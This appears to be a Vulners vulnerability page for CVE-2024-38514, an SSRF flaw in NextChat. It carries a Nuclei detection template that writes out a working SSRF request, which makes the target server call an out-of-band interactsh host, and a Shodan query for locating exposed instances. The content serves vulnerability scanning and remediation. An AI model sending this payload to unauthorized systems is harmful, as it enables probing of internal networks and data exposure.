| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2024-38514 | 27 Feb 202521:02 | – | circl | |
| CVE-2024-38514 | 28 Jun 202418:11 | – | cve | |
| CVE-2024-38514 NextChat Server-Side Request Forgery (SSRF) | 28 Jun 202418:11 | – | cvelist | |
| CVE-2024-38514 | 28 Jun 202419:15 | – | nvd | |
| CVE-2024-38514 NextChat Server-Side Request Forgery (SSRF) | 28 Jun 202418:11 | – | osv | |
| PT-2024-28043 · Nextchat · Nextchat | 28 Jun 202400:00 | – | ptsecurity | |
| VulnCheck KEV: CVE-2024-38514 | 25 Feb 202500:00 | – | vulncheck_kev | |
| CVE-2024-38514 NextChat Server-Side Request Forgery (SSRF) | 28 Jun 202418:11 | – | vulnrichment | |
| NextChat < 2.12.4 Server-Side Request Forgery | 24 Jun 202400:00 | – | nessus |
id: CVE-2024-38514
info:
name: NextChat - Server-Side Request Forgery
author: DhiyaneshDk
severity: high
description: |
NextChat v2.12.3 suffers from a Server-Side Request Forgery (SSRF) and Cross-Site Scripting vulnerability due to a lack of validation of the GET parameter on the WebDav API endpoint.
impact: |
Unauthenticated attackers can perform SSRF attacks to access internal services, scan internal networks, or exfiltrate sensitive information from systems that should not be accessible externally.
remediation: |
Upgrade to NextChat version 2.12.4 or later that includes proper validation of the endpoint parameter.
reference:
- https://www.tenable.com/security/research/tra-2024-23
- https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/commit/dad122199a85c2f12277593973e1784b212adf5e
- https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/security/advisories/GHSA-gph5-rx77-3pjg
- https://nvd.nist.gov/vuln/detail/CVE-2024-38514
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 7.4
cve-id: CVE-2024-38514
cwe-id: CWE-918
epss-score: 0.02186
epss-percentile: 0.80219
metadata:
verified: true
max-request: 1
shodan-query: "title:NextChat,\"ChatGPT Next Web\""
tags: cve,cve2024,ssrf,xss,chatgpt,nextchat,vkev,vuln,ai
http:
- raw:
- |
GET /api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "__NEXT_DATA__"
# digest: 4a0a004730450220572bf8eac9861fa0ee73d53483f3d1909f724eb76f63ead7ba910a438a39f7c1022100bda51c07f4b0f7c68d1dbf950aaa793cde3b0b502d1cf780f70cc2d330250ec9:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation